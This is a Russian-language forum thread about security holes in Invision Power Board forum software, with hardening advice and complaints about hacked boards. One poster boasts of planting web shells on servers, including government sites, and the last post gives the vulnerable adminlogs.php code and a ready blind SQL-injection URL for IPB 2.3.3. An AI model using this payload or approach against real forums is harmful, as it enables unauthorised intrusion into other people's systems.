Уязвимость IPB

Статус
В этой теме нельзя размещать новые ответы.
moj ipb 2.3.1 lomali uzhe raz 20 za poslednie 9 mesjacev.. 1 raz poluchilosj vzjat moj pass..

krch ujazvimosti est..:mad:
 
Для просмотра ссылки Войди или Зарегистрируйся, ага уязвимость "кривые руки", степерь опасности критическая, багфиксов пока не найдено...

1. Перейминовал ли ты админку?
2. Закрыл ли ты её хтаксексом?
3. Ставил ти ты дирявые хаки?

Между прочем в ИПБ есть целый набор инструментов повышающий его секюритность, от сканирования файлов по хешсумам до закрытия директорий хтаксексами...

Можно немного модернизировать класс соиденения с БД и вылавливать все попытки инжекций...

ну и следите за обновлениями на офсайте ипб бла-бла-бла...
 
Уязвимость стара как мир, но при этом до сих-пор встречается как правило на заброшеных порталах...
Примерно года 2-а назад в Журнале ХАКЕР была статья и подробное описание этой дыры+на диске лежал ролик показывающий это всё в действии...
Я-тогда ещё был далёкий от хака человеком... В результате через 2-3 месяца я с помошью этой уязвимости поимел примерно 15 веб шелов залитых на различные серваки, причём пара из них была залита на gov.
Вот такие пироги!
 
  • Заблокирован
  • #15
2.1.6 - самая дырявая... ломали неоднократно... нервов потрепали немеряно... зато теперь проапдейтился до 2.3 - думаю с пол года можно будет жить спокойно...

Кстати, этот сплойт не работает под 2.1.7
 
А кто знает дыры в версии 1.2?
Версия старая конечно... Но я долго искала в сети какие нить упоминания про дырки в этой версии и ничего не нашла.:nezn:
 
  • Заблокирован
  • #17
mitos
И вретли уже что-либо найдешь ;) На 1.3 версию уже не всегда найдешь ))
 
А кто знает дыры в версии 1.2?
Версия старая конечно... Но я долго искала в сети какие нить упоминания про дырки в этой версии и ничего не нашла.:nezn:

так ищи на <1.3 .... таких сплоитов полно в сети!!!
 
по идеи ща самая кульная и защищенная это последняя - 2.3.3. советую всем обновится
 
2.3.3 blind sql-injection

пока искал скины к 2.3.3 версии, нашел такого зверька :

IPB <= 2.3.3 blind sql-injection

EXPLOIT

Код:
PHP:
-------------
adminlogs.php
-------------

БАГ НАШЁЛ: perdimonokl aka 4nob1oz

/*
* VULN FUNCTION
* ----------------
*
* function view()
*
* ----------------
* VULN CODE
*
* --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
* else
* {
* $this->ipsclass->input['search_string'] = urldecode($this->ipsclass->input['search_string']);
*
* $dbq = "m.".$this->ipsclass->input['search_type']." LIKE '%".$this->ipsclass->input['search_string']."%'";
*
* $row = $this->ipsclass->DB->build_and_exec_query( array( 'select' => 'COUNT(m.id) as count', 'from' => 'admin_logs m', 'where' => $dbq ) );
*
* $row_count = $row['count'];
*
* $query = "&act=adminlog&code=view&search_type={$this->ipsclass->input['search_type']}&search_string=".urlencode($this->ipsclass->input['search_string']);
*
* $this->ipsclass->DB->cache_add_query( 'adminlogs_view_two', array( 'dbq' => $dbq, 'limit_a' => $start ) );
* $this->ipsclass->DB->cache_exec_query();
* }
*
* --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
*
*/

adsess=85f93b41dd3244e5680f5085b28b56bf ---> Когда вы заходите в админ панель вы открываете админскую сессию и её вы можете увидеть в переменной "adsess="

Замените переменную "adsess=" в урл эксплойта вашей :

В итоге получаем следующий URL :
PHP:
http://localhost/forum/admin/index.php?adsess=85f93b41dd3244e5680f5085b28b56bf&section=admin&act=adminlog&code=view&act=adminlog&section=admin&search_string=333&search_type=act+and+1=if(substring(version(),1,1)=  5,1,benchmark(999999,md5(now())))-
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху